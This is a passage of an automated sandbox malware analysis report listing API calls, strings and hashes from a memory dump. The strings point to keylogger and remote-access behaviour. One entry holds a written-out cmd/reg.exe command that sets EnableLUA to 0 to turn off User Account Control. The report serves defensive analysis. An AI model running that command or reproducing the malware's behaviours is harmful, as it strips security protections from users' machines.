                                            • Instruction Fuzzy Hash: 87A156729846829FF721CF58C8817AEBBA5FF15314F2841AFE8859B381D27C8C51C75A
                                            APIs
                                            • GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                            • _free.LIBCMT ref: 004482CC
                                            • _free.LIBCMT ref: 004482F4
                                            • SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448301
                                            • SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                            • _abort.LIBCMT ref: 00448313
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorLast$_free$_abort
                                            • String ID:
                                            • API String ID: 3160817290-0
                                            • Opcode ID: c2591106eec843b6d6e807480f59c56eb64d59fc50806e925db96e87570db6c2
                                            • Instruction ID: 8d34d3ffa9a8a5ca7629c839d325bdddc3ef58a145117f7ac1d0225592351e3a
                                            • Opcode Fuzzy Hash: c2591106eec843b6d6e807480f59c56eb64d59fc50806e925db96e87570db6c2
                                            • Instruction Fuzzy Hash: 8EF0A435101B006BF611772A6C06B6F26599BD3B69F36042FFD18962D2EF6DCC42816D
                                            APIs
                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB46
                                            • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB5A
                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB67
                                            • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB76
                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB88
                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB8B
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Service$CloseHandle$Open$ControlManager
                                            • String ID:
                                            • API String ID: 221034970-0
                                            • Opcode ID: bc8933c3fd8e2fa998b2246ab8c72ed9b0f5170f60f0245b371609b51ac54b8f
                                            • Instruction ID: 443f58cffa4f299642b313368f914f767bd977a6fac550f0ec2f38f013616b5a
                                            • Opcode Fuzzy Hash: bc8933c3fd8e2fa998b2246ab8c72ed9b0f5170f60f0245b371609b51ac54b8f
                                            • Instruction Fuzzy Hash: E4F0F631541318BBD7116F259C49DFF3B6CDB45B62F000026FE0992192EB68DD4595F9
                                            APIs
                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC4A
                                            • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC5E
                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC6B
                                            • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC7A
                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8C
                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8F
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Service$CloseHandle$Open$ControlManager
                                            • String ID:
                                            • API String ID: 221034970-0
                                            • Opcode ID: 94d93926ec858c5890fc603d54741d931e0eaafa3f6b468ff921a10e10d86c77
                                            • Instruction ID: 80b71cf000cc834045a6d48b23744411b71cc7e49355023a2f572df053a73ec4
                                            • Opcode Fuzzy Hash: 94d93926ec858c5890fc603d54741d931e0eaafa3f6b468ff921a10e10d86c77
                                            • Instruction Fuzzy Hash: 73F0C231501218ABD611AF65AC4AEFF3B6CDB45B62F00002AFE0992192EB38CD4595E9
                                            APIs
                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACB1
                                            • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACC5
                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACD2
                                            • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACE1
                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF3
                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF6
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Service$CloseHandle$Open$ControlManager
                                            • String ID:
                                            • API String ID: 221034970-0
                                            • Opcode ID: 4f42f77feb4e09d2984437374767d6fba58dab4553ac710dbf5187c031f369c2
                                            • Instruction ID: 4c72e2560426042a93d841201029be6eaa37955ba2c7d49e75f16ae618c5df44
                                            • Opcode Fuzzy Hash: 4f42f77feb4e09d2984437374767d6fba58dab4553ac710dbf5187c031f369c2
                                            • Instruction Fuzzy Hash: 85F0F631501228BBD7116F25AC49DFF3B6CDB45B62F00002AFE0992192EB38CD46A6F9
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: PkGNG
                                            • API String ID: 0-263838557
                                            • Opcode ID: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                            • Instruction ID: b0a34e1ed6630e1fb57c9e62860a3601010315cd62f19612bff23542d182db60
                                            • Opcode Fuzzy Hash: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                            • Instruction Fuzzy Hash: 70412AB1600704BFE724AF79CD41B5EBBE8EB88714F10462FF145DB281E3B999058798
                                            APIs
                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
                                            • CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404DD2
                                            • CloseHandle.KERNEL32(?), ref: 00404DDB
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                            • String ID: PkGNG
                                            • API String ID: 3360349984-263838557
                                            • Opcode ID: 77a6d032992f3495e2e52a01d2ead9a1ebcb79a8041a0f526cc04fc7fe31482d
                                            • Instruction ID: 30d48123e17294c38ae6f490953f1b42a5ca81467cb0df1087f173bd09261e59
                                            • Opcode Fuzzy Hash: 77a6d032992f3495e2e52a01d2ead9a1ebcb79a8041a0f526cc04fc7fe31482d
                                            • Instruction Fuzzy Hash: 684182B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666
                                            APIs
                                            • GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B1AD
                                            • wsprintfW.USER32 ref: 0040B22E
                                              • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,00000000,0040B245,00000000), ref: 0040A69D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: EventLocalTimewsprintf
                                            • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                            • API String ID: 1497725170-248792730
                                            • Opcode ID: b92970106d7d5ed65003fb4f3b7a0e91fd1e2f7406e6a9ff2526561c329a63fb
                                            • Instruction ID: 4bcbbea8953a56f0834a7592719eb704c83d71ae81c48fe005db4fd1b538d991
                                            • Opcode Fuzzy Hash: b92970106d7d5ed65003fb4f3b7a0e91fd1e2f7406e6a9ff2526561c329a63fb
                                            • Instruction Fuzzy Hash: 88114272404118AACB19AB96EC55CFE77BCEE48315B00012FF506A61D1FF7C5A45C6AD
                                            APIs
                                            • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A788), ref: 0040A6E6
                                            • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                            • Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                            • CloseHandle.KERNEL32(00000000,?,?,?,0040A788), ref: 0040A729
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: File$CloseCreateHandleSizeSleep
                                            • String ID: XQG
                                            • API String ID: 1958988193-3606453820
                                            • Opcode ID: 09b71735cca9286fb237afdc81f34cc8b89fa37515d8f2a58262fc809d9c95cd
                                            • Instruction ID: fa029248b1ac628aedb802b18ed81a98d1a4018e107c0b234daa3009ae89debe
                                            • Opcode Fuzzy Hash: 09b71735cca9286fb237afdc81f34cc8b89fa37515d8f2a58262fc809d9c95cd
                                            • Instruction Fuzzy Hash: 96110130600740AADA31A734988961F7BA9DB45356F44483EF1866B6D3C67DDC64C71F
                                            APIs
                                            • RegisterClassExA.USER32(00000030), ref: 0041D5EC
                                            • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D607
                                            • GetLastError.KERNEL32 ref: 0041D611
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ClassCreateErrorLastRegisterWindow
                                            • String ID: 0$MsgWindowClass
                                            • API String ID: 2877667751-2410386613
                                            • Opcode ID: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
                                            • Instruction ID: e808ecd18ef19f47bd472c0c6462b34ef8490c58390ad3ae495a6aa035ed2a4b
                                            • Opcode Fuzzy Hash: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
                                            • Instruction Fuzzy Hash: 1F0125B1D00219ABDB00DFA5EC849EFBBBCEA08355F40453AF914A6241EB7589058AA4
                                            APIs
                                            • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 004077D6
                                            • CloseHandle.KERNEL32(?), ref: 004077E5
                                            • CloseHandle.KERNEL32(?), ref: 004077EA
                                            Strings
                                            • C:\Windows\System32\cmd.exe, xrefs: 004077D1
                                            • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004077CC
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CloseHandle$CreateProcess
                                            • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                            • API String ID: 2922976086-4183131282
                                            • Opcode ID: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
                                            • Instruction ID: 1887ccd63cb29ce90d3c4a9dee080bc6fb52b3336ad705aa4023eed0db3a7680
                                            • Opcode Fuzzy Hash: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
                                            • Instruction Fuzzy Hash: 04F09672D4029C76CB20ABD7AC0EEDF7F3CEBC5B11F00051AF904A2045DA745400CAB5
                                            Strings
                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe, xrefs: 004076FF
                                            • SG, xrefs: 00407715
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: SG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                            • API String ID: 0-1732489412
                                            • Opcode ID: 534232ae4986bc0cd44d5d9dbb6e579f37bf6e7b645008295a27304146529b35
                                            • Instruction ID: 5ffff352cfcc2e87221e4fa572a01d73507d198e899e6baa5594ec663d9dd15d
                                            • Opcode Fuzzy Hash: 534232ae4986bc0cd44d5d9dbb6e579f37bf6e7b645008295a27304146529b35
                                            • Instruction Fuzzy Hash: 8DF02BB0E04600EBCB1477345D296AA3656A780397F40487BF507EB2F2EBBD5C41871E
                                            APIs
                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EF8), ref: 00405120
                                            • SetEvent.KERNEL32(?), ref: 0040512C
                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00405137
                                            • CloseHandle.KERNEL32(?), ref: 00405140
                                              • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                            • String ID: KeepAlive | Disabled
                                            • API String ID: 2993684571-305739064
                                            • Opcode ID: 260c2b08e01b5d66b359e99273a0c89895ec309b6af50f33d4504d26b953d9d7
                                            • Instruction ID: dc79248355977efa3495ea8e96f68553e1f2867eb32bbe7dc6984d352a193ca4
                                            • Opcode Fuzzy Hash: 260c2b08e01b5d66b359e99273a0c89895ec309b6af50f33d4504d26b953d9d7
                                            • Instruction Fuzzy Hash: 5DF06D71904711BBDB203B758D0AAAB7E95AB06315F0009BEF982916E2D6798C408F9A
                                            APIs
                                              • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                            • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041AE83
                                            • PlaySoundW.WINMM(00000000,00000000), ref: 0041AE91
                                            • Sleep.KERNEL32(00002710), ref: 0041AE98
                                            • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AEA1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: PlaySound$HandleLocalModuleSleepTime
                                            • String ID: Alarm triggered
                                            • API String ID: 614609389-2816303416
                                            • Opcode ID: fc1dfc3d80636db02bd80d67f349f84282c1adb2487fd06cf6dad27e320cdf65
                                            • Instruction ID: 264e31dd7f8ae4a58c3cd97330858728e5483d82e525179ed11d996d756d41c5
                                            • Opcode Fuzzy Hash: fc1dfc3d80636db02bd80d67f349f84282c1adb2487fd06cf6dad27e320cdf65
                                            • Instruction Fuzzy Hash: 3EE0D826A40220779A10337B6D0FD6F3D29CAC3B2570100BFFA05660C2DD540C01C6FB
                                            APIs
                                            • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CE7E), ref: 0041CDF3
                                            • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041CE7E), ref: 0041CE00
                                            • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041CE7E), ref: 0041CE0D
                                            • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041CE7E), ref: 0041CE20
                                            Strings
                                            • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CE13
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Console$AttributeText$BufferHandleInfoScreen
                                            • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                            • API String ID: 3024135584-2418719853
                                            • Opcode ID: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
                                            • Instruction ID: 3099d3b49c49d1df3d44327ff87017ee7d1b0803ff7cdb2815dc6b7c28d9377e
                                            • Opcode Fuzzy Hash: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
                                            • Instruction Fuzzy Hash: B6E04872504315E7E31027B5EC4DCAB7B7CE745613B100266FA16915D39A749C41C6B5
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3500d967bf213ad3b95b014004bc41782de99095ad53c5e0f3d0147f9504bf37
                                            • Instruction ID: 15e211ccade7fc2a5debfa8ad78d9bfa955d5b29a73147504924d067d3782226
                                            • Opcode Fuzzy Hash: 3500d967bf213ad3b95b014004bc41782de99095ad53c5e0f3d0147f9504bf37
                                            • Instruction Fuzzy Hash: 2771D4319012569BEB21CF55C884AFFBB75EF55310F19412BE815672A0DB78CCC1CBA8
                                            APIs
                                            • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
                                            • _free.LIBCMT ref: 0044943D
                                              • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                              • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                            • _free.LIBCMT ref: 00449609
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                            • String ID:
                                            • API String ID: 1286116820-0
                                            • Opcode ID: 5cd2e88b37ead4a53a3ad7e2b8222e2e62bf3e8d34a7aba608fbabac987024fa
                                            • Instruction ID: 45cf5ea20785abb2a7eec221213eb08c1b8584214e6df16efc40294c4842d026
                                            • Opcode Fuzzy Hash: 5cd2e88b37ead4a53a3ad7e2b8222e2e62bf3e8d34a7aba608fbabac987024fa
                                            • Instruction Fuzzy Hash: 1B51EC71900205ABEB14EF69DD819AFB7B8EF44724F20066FE418D3291EB789D41DB58
                                            APIs
                                              • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F956
                                            • Process32FirstW.KERNEL32(00000000,?), ref: 0040F97A
                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F989
                                            • CloseHandle.KERNEL32(00000000), ref: 0040FB40
                                              • Part of subcall function 0041C076: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F634,00000000,?,?,00475338), ref: 0041C08B
                                              • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                              • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FB31
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                            • String ID:
                                            • API String ID: 4269425633-0
                                            • Opcode ID: f228ff349881c5e95adb389dcff9344117252c23684542f11b6a3310bcbf0aa2
                                            • Instruction ID: d02cab962e177bd28921c4f9a71df23b762ba7d31cecf8da060328e0f3db66c6
                                            • Opcode Fuzzy Hash: f228ff349881c5e95adb389dcff9344117252c23684542f11b6a3310bcbf0aa2
                                            • Instruction Fuzzy Hash: 5F4136311083419BC325F722DC51AEFB3A5AF94305F50493EF58A921E2EF385A49C65A
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _free
                                            • String ID:
                                            • API String ID: 269201875-0
                                            • Opcode ID: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                            • Instruction ID: bbec49e9ccdd5c2af131aecc9b6810ea24321c3eb42f74c08fbdd36582e243a3
                                            • Opcode Fuzzy Hash: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                            • Instruction Fuzzy Hash: 5F41E232E00200AFEB14DF78C881A5EB3B5EF89B18F1545AEE915EB351D735AE05CB84
                                            APIs
                                            • GetEnvironmentStringsW.KERNEL32 ref: 0044F3E3
                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F406
                                              • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435349,?,?,004388C7,?,?,00000000,00476B50,?,0040DE9D,00435349,?,?,?,?), ref: 004461EA
                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F42C
                                            • _free.LIBCMT ref: 0044F43F
                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F44E
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                            • String ID:
                                            • API String ID: 336800556-0
                                            • Opcode ID: 7d1f56057eec42b9e44eaca7954531e52edb8e618f6c0f5134274d299c642649
                                            • Instruction ID: b6d7bf627ac8e1e23e8e90154f8049d5dc13ee9613ce4caf203d647ba434722a
                                            • Opcode Fuzzy Hash: 7d1f56057eec42b9e44eaca7954531e52edb8e618f6c0f5134274d299c642649
                                            • Instruction Fuzzy Hash: 2401DF72602721BF37211ABB5C8DC7F6AACDEC6FA5355013AFD04D2202DE688D0691B9
                                            APIs
                                            • CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C5A1,00000000,00000000,00000000), ref: 0041C4C1
                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,0041C5A1,00000000,00000000), ref: 0041C4DE
                                            • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041C5A1,00000000,00000000), ref: 0041C4EA
                                            • WriteFile.KERNEL32(00000000,00000000,00000000,00406FC0,00000000,?,00000004,00000000,0041C5A1,00000000,00000000), ref: 0041C4FB
                                            • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041C5A1,00000000,00000000), ref: 0041C508
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: File$CloseHandle$CreatePointerWrite
                                            • String ID:
                                            • API String ID: 1852769593-0
                                            • Opcode ID: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                                            • Instruction ID: 0233a984b642d2e84dd4fc2cab076f06cd7f632185dc4648213adf39284592b7
                                            • Opcode Fuzzy Hash: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                                            • Instruction Fuzzy Hash: 6311E571288215BFE7104A24ACC8EBB739CEB46365F10862BF912D22D0C624DC418639
                                            APIs
                                            • GetLastError.KERNEL32(?,00000000,?,0043BCD6,00000000,?,?,0043BD5A,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0044831E
                                            • _free.LIBCMT ref: 00448353
                                            • _free.LIBCMT ref: 0044837A
                                            • SetLastError.KERNEL32(00000000), ref: 00448387
                                            • SetLastError.KERNEL32(00000000), ref: 00448390
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorLast$_free
                                            • String ID:
                                            • API String ID: 3170660625-0
                                            • Opcode ID: 1cfc413842d63f34c7f1edcf4c7ea3bb1e2262b941f6d70642a76626a3a2f89f
                                            • Instruction ID: 5af5a014564f127a9d6b3613d5887cb4baea3ca98ff5bc54bcf39f1731b7af1a
                                            • Opcode Fuzzy Hash: 1cfc413842d63f34c7f1edcf4c7ea3bb1e2262b941f6d70642a76626a3a2f89f
                                            • Instruction Fuzzy Hash: 3401F936100B006BB7117A2A5C45E6F3259DBD2B75B35093FFD1892292EF7ECC02812D
                                            APIs
                                            • _free.LIBCMT ref: 00450A54
                                              • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                              • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                            • _free.LIBCMT ref: 00450A66
                                            • _free.LIBCMT ref: 00450A78
                                            • _free.LIBCMT ref: 00450A8A
                                            • _free.LIBCMT ref: 00450A9C
                                            Memory Dump Source
